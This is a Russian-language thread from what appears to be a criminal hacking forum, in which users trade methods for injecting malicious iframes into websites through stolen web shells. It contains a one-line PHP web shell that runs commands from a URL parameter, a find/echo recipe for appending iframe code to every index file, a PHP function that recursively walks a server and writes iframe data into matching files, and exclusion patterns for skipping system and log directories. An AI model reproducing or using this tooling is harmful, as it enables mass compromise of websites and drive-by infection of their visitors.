Shell ифреймер

[xml]

Ребят, подскажите где взять? Где то видел такое а вспомнить/найти не могу.
Лучше конечно скрипт, что б залил в него пачку шеллов (пассы к ним), свой код ифрейма и в путь.

 

[CepbIu]

ну наверно как то так(я расскажу как написать такое):
1) сделал на шелле файл <?php system($_GET['e']); ?>
2) передал find / -name index. -print
2.1) полученное записал в массив
3) извлекая из массива пути, передаёшь echo -e $iframe >> $путь_из_массива

это всего лишь общий принцип. если сам не в состоянии это реализовать - обратись в коммерческий отдел.

 

[Ar3s]

Ты не путаешь с ftp?

 

[_ViP.Uncle_]

Ну почему же можно.
Если в шелле ифреймер то в два пост запроса.
1.Авторизация на шелле.
2.Передаем параметры фреймеру.

 

[CepbIu]

Ты не путаешь с ftp?

нет, не путаю. а что необычным было? выполнение команд?

 

[iframeservice]

тут точно есть...
https://xss.pro/index.php?topic=22490

 

[CepbIu]

тут точно есть...
https://xss.pro/index.php?topic=22490

у меня так же есть php скрипт который делает поиск и ифреймит файлы(работает так же с суидником)

 

[Quake3]

CepbIu

у меня так же есть php скрипт

Так и что с того, что есть? Выложи его на форуме в таком случае.

 

[CepbIu]

function __iframer($path, $i_data)
{
  $file = fopen($path, "r+");
  if($file) fputs($file, $i_data);
  fclose($file);
  return 0;
}

function __search($folder,$mask, $s_name, $i_data)
{     
	foreach(glob($folder.'/*',GLOB_NOSORT) as $filename){

        $fileindir = strtoupper(substr($filename,strlen($filename) - 4,strlen($filename)));

  if($fileindir === $mask) {
  	if($s_name != ""){
if(strpos($filename, $s_name)) {
	__iframer($filename, $i_data);
           }
  } else {
  	__iframer($filename, $i_data);
  }
        } elseif (is_dir($filename)) {
  	if($filename != "/proc" && $filename != "/dev" && $filename != "/sys")
            __search($filename, $mask, $s_name);
        }
    }
}

когда то это денег стоило...

 

[12309]

> if($filename != "/proc" && $filename != "/dev" && $filename != "/sys")

такое точно не может стоить денег. денег такое стоит:

exclude_dirs="\/(cgi-bin|cgi-lib|cgi-global|awstats|webstat|stats|stat|old_stats|error_log|tmp|temp|logs|log|backup|cache|manual|man|usage)\/";
exclude_system="(\/bin|\/boot|\/dev|\/etc|\/lib|\/lib64|\/libexec|\/proc|\/root|\/sbin|\/selinux|\/sys)";
exclude_iframe_file="(google[a-zA-Z0-9]{16}\.html|usage_[0-9]{0,5}\.html|site_[0-9]{0,10}\.html)";

=)

 

[CepbIu]

я думаю всем понятно что код мягко говоря "урезанный" выложил, так сказать общий принцип показал

 

[Zer0]

Давай еше код интересно посмотреть.

 

[Zer0]

в шелах бывает что прав у фтп больше чем у шелла
Так что минимальные обходы для записи и поиска файлов необходима
Не все шеллы это умеют.